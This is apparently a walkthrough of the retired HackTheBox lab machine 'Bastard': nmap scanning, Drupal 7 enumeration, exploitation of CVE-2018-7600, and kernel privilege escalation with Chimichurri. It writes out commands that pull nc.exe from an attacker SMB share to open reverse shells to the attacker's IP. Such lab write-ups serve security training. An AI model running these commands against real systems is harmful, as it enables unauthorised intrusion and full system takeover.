Today we are going to solve a another Hackthebox retired machine called “Bastard” . This lab was designed by . So let jump into machine .
Level : Easy
- Networking Scanning
- Manual Enumeration of CMS
- Drupal Exploit
- Privilege Escalation
- Kernel Exploit
IP address : 10.129.145.159
We start our journey my doing the nmap scan with script and version scan which give us some information about open ports and service running on the target system .
nmap -sC -sV -p- 10.129.145.159
Nmap show some result with some service running on target like on port 80 HTTP service is running and on same time we can also get an idea that drupal 7 is running on . There are some other port is also open like 145 , 49154 .
Nmap scan report for 10.129.145.159 Host is up (0.17s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to Bastard | Bastard 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Now from the result we chose to go with port 80 that is drupal CMS so we start enumerating it , after some google we get know that by visiting to changelog page we can get some information .
here get the actual information about the version which is drupal 7.54 and with my past experience its directly exploitable .
After searching on internet i got a exploit , also we can use Metasploit also but we want to learn manual exploitation so we skip the Metasploit . Exploit is available on GitHub .
This particular version of drupal have remote code execution vulnerability . we get the user information from the exploit so we can confirm that exploit is working fine . Now all we have to figure out to get the reverse shell .
https://github.com/pimps/CVE-2018-7600 cd CVE-2018-7600 python drupa7-CVE-2018-7600.py http://10.129.145.159 -c whoami
For reverse shell we use netcat binary and then use the temporary smb server using impacket and then by remote code execution vulnerability we make reverse connection to our kali machines . Netcat pre compiled binary is already available on kali linux under the location of /usr/share/window-binaries .
cp /usr/share/windows-binaries/nc.exe ./ sudo smbserver.py share .
once everything is setup its time to exploit the and get the initial foothold on the target machine .
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c "\\\10.10.14.79\share\nc.exe -e cmd.exe 10.10.14.79 1234" rlwrap nc -lnvp 1234
we got the reverse shell over netcat on port 1234 .
since we get the inital foothold on target its time to elevate our privileges to administrative account . We check about the system information with window command “systeminfo” and here we get to know that system may be vulnerable to kernel exploit as there is no patch is installed and this machine is window server 2008 R2 . So for that we can use different tool like window exploit suggester or wesng and many more .
systeminfo Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00496-001-0001283-84782 Original Install Date: 18/3/2017, 7:04:46 �� System Boot Time: 15/5/2021, 11:15:16 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. : AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz : AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.573 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.599 MB Virtual Memory: In Use: 496 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. : vmxnet3 Ethernet Adapter Connection Name: Local Area Connection 3 DHCP Enabled: Yes DHCP Server: 10.129.0.1 IP address(es) : 10.129.145.159 : fe80::6ccc:55b:423f:1148 : dead:beef::6ccc:55b:423f:1148
To work on window exploit suggester we have to setup the virtual environment and then install some dependencies , for creating the virtual environment we used virtualenv program .
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git cd Windows-Exploit-Suggester pip install virtualenv virtualenv -p python2 venv source venv/bin/activate pip install xlrd==1.2.0 python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2021-05-15-mssb.xls --systeminfo ../systeminfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [*] done
after some time , trying different kernel exploit we decide to try “Chimichurri” program which you can download from GitHub . We transfer this binary to victim machine using temp smb server .
cp ~/Downloads/Chimichurri.exe ./ sudo smbserver.py share .
so while we are trying to write the files on target system we didn’t have writing permission so we move to whitelisted placed like Temp,tasks directory .
cd "C:\windows\tasks" copy \\10.10.14.79\share\Chimichurri.exe
After successfully transfer of binary its time to create reverse shell .
Chimichurri.exe 10.10.14.79 4444
finally we got the elevated shell and now its time to collect the gems or flags .
rlwrap nc -lvnp 4444 type "C:\Users\Administrator\Desktop\root.txt.txt" type "C:\Users\dimitris\Desktop\user.txt"